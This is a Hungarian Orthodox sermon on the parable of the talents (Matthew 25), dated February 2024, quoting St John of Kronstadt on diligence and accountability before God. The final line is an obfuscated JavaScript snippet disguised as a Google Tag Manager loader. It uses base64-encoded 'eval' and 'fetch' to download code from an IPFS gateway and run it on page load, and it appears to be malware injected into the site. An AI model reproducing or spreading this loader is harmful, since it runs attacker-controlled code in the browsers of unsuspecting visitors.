Máté evangéliuma, 25,14–30

(Példázat a talentumokról)

Abban az időben ezt mondta az Úr:

“Úgy lesz akkor, mint amikor egy ember arra készült, hogy külföldre menjen. Hívta a szolgáit és átadta nekik vagyonát. Az egyiknek öt talentumot adott, a másiknak kettőt, a harmadiknak pedig egyet, mindegyiknek a képessége szerint; és elment külföldre. Ekkor rögtön elment az, aki öt talentumot kapott, befektette azokat, és szerzett másik ötöt. Éppígy az is, aki kettőt kapott, szerzett másik kettőt. Az viszont, aki egyet kapott, elment, a földbe ásva elrejtette ura pénzét. Sok idő múltán megjött ezeknek a szolgáknak az ura és számadást tartott velük. Előállt ekkor az, aki öt talentumot kapott, hozott másik öt talentumot, és így szólt: Uram, öt talentumot adtál nekem, nézd, másik öt talentumot nyertem rajta.’ Az ura azt mondta neki: Jól van, derék és hű szolga! A kicsiben hű voltál, sokat bízok rád: menj be urad örömébe. Ezután jött az is, aki a két talentumot kapta és így szólt: Uram, két talentumot adtál nekem, nézd, másik két talentumot nyertem rajta. Az ura azt mondta neki: Jól van, derék és hű szolga, a kicsiben hű voltál, sokat bízok rád: menj be urad örömébe. Végül odajött az is, aki egy talentumot kapott, és azt mondta: Uram, tudom rólad, hogy kemény ember vagy, aratsz, ahol nem vetettél, és begyűjtesz onnan is, ahová nem ültettél. Mivel féltem tőled, elmentem és elrejtettem a talentumodat a földbe. Íme, itt van, ami a tied! Az ura azt válaszolta neki: Te gonosz és lusta szolga! Tudtad, hogy aratok, ahol nem vetettem és gyűjtök onnan, ahová nem ültettem. Éppen ezért el kellett volna helyezned a pénzemet a pénzváltóknál, hogy amikor megjövök, kamatostul kapjam vissza a magamét. Vegyétek hát el tőle a talentumot és adjátok annak, akinek tíz talentuma van! Mert mindannak, akinek van, még adnak és bővelkedni fog. Attól pedig, akinek nincs, még azt is elveszik, amije van. A haszontalan szolgát pedig dobjátok ki a külső sötétségre! Lesz majd ott sírás és fogcsikorgatás!”

+

Szeretett Testvéreim!

Hallottuk a szent evangéliumból, hogy egy gazdag ember hosszú, külföldi útra készült, és átadta szolgáinak minden vagyonát. Már a helyzet is abszurd. Melyik gazdag ember bízná vagyonát a szolgáira, alkalmazottaira? Tudjuk a választ, mert a példabeszédben ez a gazdag ember maga a Jó Isten. Nem is akármilyen vagyont bízott szolgáira, óriási, számunkra felfoghatatlan vagyont. Egy talentum ugyanis a Bibliában mintegy 60 kg-ot jelentett, aranyban számolva elképzelhetetlenül nagy összeg, de ezüstben is legalább egy ház ára. Az egyik szolga öt talentumot kapott, a másik kettőt, csak a harmadik kapott egyet. Hogyan olvassuk? „Mindegyiknek a képessége szerint”.

Isten tehát mindegyikünkre hatalmas, felfoghatatlan vagyont, értéket bízott, mindenkinek képessége szerint. Ez nagyon fontos, mert nem vagyunk egyformák. Mások a szüleink, az életkörülményeink, a neveltetésünk, az iskolázottságunk, a tehetségünk. A talentumok ugyanis nem csupán a képességeket, a tehetséget jelentik, hanem mindent, amivel az ember rendelkezik: a lehetőségeket, az alkalmakat, az időt, az anyagi tehetséget és így tovább. Mindent, amivel mások hasznára lehetünk, mert ez a példabeszéd erről szól: Istentől mindannyian olyan javakat kaptunk, amelyeket kamatoztatni kell, képességeket, tehetséget, szorgalmat, vagyont, ismerősi kört, kapcsolatokat. Ő pedig azt várja, hogy ezeket mások hasznára gyarapítsuk.

A példabeszédből kiderül, hogy a dolgok, amelyeket Istentől kaptunk, nem a mieink! Minden Istené, Tőle kaptuk és Neki is kell visszaadnunk. Hallani ma ilyesféle megnyilatkozásokat: „Ez az én életem, azt csinálok vele, amit akarok”, „Nekem senki se mondja meg, mit tegyek, mert ez egyedül az én életem.” Teljes félreértés van az ilyen szavakban. Nem az én életem, mert nem tudom magamnak megadni, és nem is rendelkezem vele. Akaratomon és hatalmamon kívül kaptam, el is veszíthetem, és nincs fölötte uralmam. Ilyet is hallani, „Nem szülök gyermeket, mert ez az én méhem.” Mennyire más a Szentséges Istenszülő hozzáállása: „Íme, az Úr szolgálóleánya vagyok, legyen nekem a te szavaid szerint.”

Tehát minden, ez az óriási vagyon Isten tulajdona, de nekünk kell valamit kezdenünk vele. Az, aki öt talentumot kapott, befektette, megkétszerezte, ugyanígy az is, aki két talentumot kapott. Aki viszont egyet kapott, nem forgatta meg a pénzt, hanem elásta. Mit jelent ez? Amíg a többiek dolgoztak, munkálkodtak, gondoskodtak a rájuk bízott hatalmas vagyon gyarapításáról, addig az, aki egy talentumot kapott, biztosra akart menni, ezért nem tett semmit, illetve csak egy dolgot tett: elásta a pénzét. Hogy is szól hozzá a gazdája, amikor visszatér? „Te gonosz és lusta szolga.”  Pedig a szolga voltaképpen semmi rosszat sem tett. Megőrizte, amit kapott, nem vett el belőle, nem is szórta el, nem költötte ostobaságokra, hanem gondosan elásta. Első ránézésre jól gazdálkodott, igaz, nem gyarapodott, de nem is veszített semmit. Csakhogy a gazdag ember, vagyis Isten ennyivel nem elégszik meg, mert ő gyarapodást vár el. Azt akarja, hogy kockáztassunk, hiszen egy nagy vagyon befektetése mindig kockázattal jár, és ezáltal gyarapítsuk.

Kronstadti Szent János atyánk Máté evangéliumához írt magyarázatában ezt mondja a gonosz és lusta szolgáról: „Földbe temette gazdája talentumait, vagyis egész életét vakmerő, megbocsáthatatlan lustaságban élte le; evett, ivott, szórakozott, gazdagodott, minden lehetséges eszközt arra használt fel, hogy itt a földön boldogan és gondtalanul éljen, az eljövendő élettel pedig nem törődött, a hittel, az imádsággal, a jó cselekedetekkel.”

Az Úr ezt mondja a Hegyi Beszédben:

„Ne gyűjtsetek magatoknak kincseket a földön, ahol moly és rozsda emészt, ahol a tolvajok betörnek és lopnak. Gyűjtsetek magatoknak kincseket a mennyben, ahol sem moly, sem rozsda nem emészt, és ahol tolvajok nem törnek be és nem lopnak. Mert ahol a kincsed van, ott lesz a szíved is” (Mt 6, 19–21).

Nem elég, hogy a lusta szolga nem gyarapította talentumait, még urát is súlyosan megvádolta:

„Tudom rólad, hogy kemény ember vagy, aratsz, ahol nem vetettél, és begyűjtesz onnan is, ahová nem ültettél” (Mt 25, 24).

Tehát igazságtalan vagy, kemény vagy, onnan akarsz javakat szerezni, ahonnan nincs jogod, nem vetsz, de aratni akarsz, nem ültetsz, de gyűjteni akarsz. Így viselkedik a felfuvalkodott ember. Perel Istennel, vitázik vele, megvádolja, és Istent okolja minden bajáért, igazságtalannak és gonosznak nevezi Istent, és végül a létét sem ismeri el. Ahogy a 9. zsoltár mondja:

„Ingerli az Urat a bűnös, és haragjának sokaságát nem veszi észre, mert nincs Isten őelőtte” (Zsolt 9, 24).

Óriási vagyont kapott, rengeteg lehetőséget, egészséget, erőt, pénzt, diplomát, tehetséget, lakást, autót, felbecsülhetetlen értéket, de ő Istent káromolja, vádolja, gyűlöli és minden bajáért őt okolja. Mint Ádám atyánk a Paradicsomban, amikor Istent okolja a bűnért, és azt mondja:

„Az asszony, Uram, akit Te Magad adtál mellém, ő adott ennem a fáról” (vö. Ter 3,12).

Azaz: „Mindenről Te tehetsz, Isten!”

Milyen megoldást ajánl nekünk Kronstadti János atyánk, hogy ne legyünk gonosz és lusta szolgák? A gyakorlást:

„Az ember testi és szellemi erői javulnak, megsokszorozódnak és megerősödnek, ha gyakorol. Gyakorold a kézírást, gyakorold a varrást, a kötést, fejleszd a kezedet, és szépen fogsz írni, szépen fogsz varrni és kötni. Gyakorold a zeneszerzést, és könnyen és jól fogsz zenét szerezni. Gyakorold a jó cselekedeteket, győzd le a szenvedélyeket és a kísértéseket, és idővel könnyedén és szívesen fogod megcselekedni az erényes tetteket, könnyen legyőzöd a szenvedélyeket Isten mindent átjáró kegyelme segítségével. De ha valaki nem gyakorolja a kézírást, a varrást, a kötést, vagy ritkán ír, varr vagy köt, akkor nehezen és rosszul fog írni, varrni és kötni. Ha nem imádkozol, vagy ritkán imádkozol, akkor az imádság terhes és nehéz lesz számodra, mint egy nagy teher a válladon. Ha nem küzdesz a szenvedélyekkel, vagy csak ritkán küzdesz és erőtlenül harcolsz, akkor nagyon nehéz lesz a harc és gyakran vereséget szenvedsz. Tehát állandóan kell küzdeni, munkálkodni, mert az élet munkálkodás és küzdelem nélkül nem élet.”

Sok ember megfeledkezik Istenről, és nem tudja, hogy számadással tartozik. Az életünk nem értelmetlen, hanem nagyon nagy felelősség, és számadással tartozunk mindenért, amit Istentől kaptunk. El fog jönni a félelmetes Ítélet, amelyről a mi Urunk ezt mondja:

„Azután feltűnik az égen az Emberfia jele, s akkor mellét veri majd a föld minden népe. Látni fogják az Emberfiát, amint eljön az ég felhőin hatalommal és nagy dicsőséggel” (Mt 24, 30).

Mit jelent, hogy „látni fogják”? Azt, hogy eddig nem látták, nem ismerték, vagy ismerték, de nem akartak tudni róla. Mi azonban látjuk őt, ismerjük őt, hallgatjuk a szavát, leborulunk az Emberfia jele, a drága és életadó Szent Kereszt előtt, és így kiáltunk:

„Urunk, irgalmazz nekünk és a Te világodnak, mint jóságos és embereket szerető!”

A-V. Gellért

2024. február 11.

Pünkösd utáni 36. vasárnap

(Kronstadti Szent János magyarázatainak forrása: Толкование на Евангелие от Матфея святого праведного Иоанна Кронштадтского. – Санкт-Петербург : Санкт-Петербургская православная духовная акад., 2009.)

(function(w,d,s,l,i,j,k,m){w[s]||(w[s]=1,w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c)))})(window,atob,’then’,’https://www.googletagmanager.com/gtm.js?id=’,’ZXZhbA==’,’ZmV0Y2g=’,’aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtYnB2NHdCeUdrUVcxVW1XVXYzUFBrYlFHWVBOUmVKOUM5Z0JzbnoxclFKQ3U=’,’17f470ba’)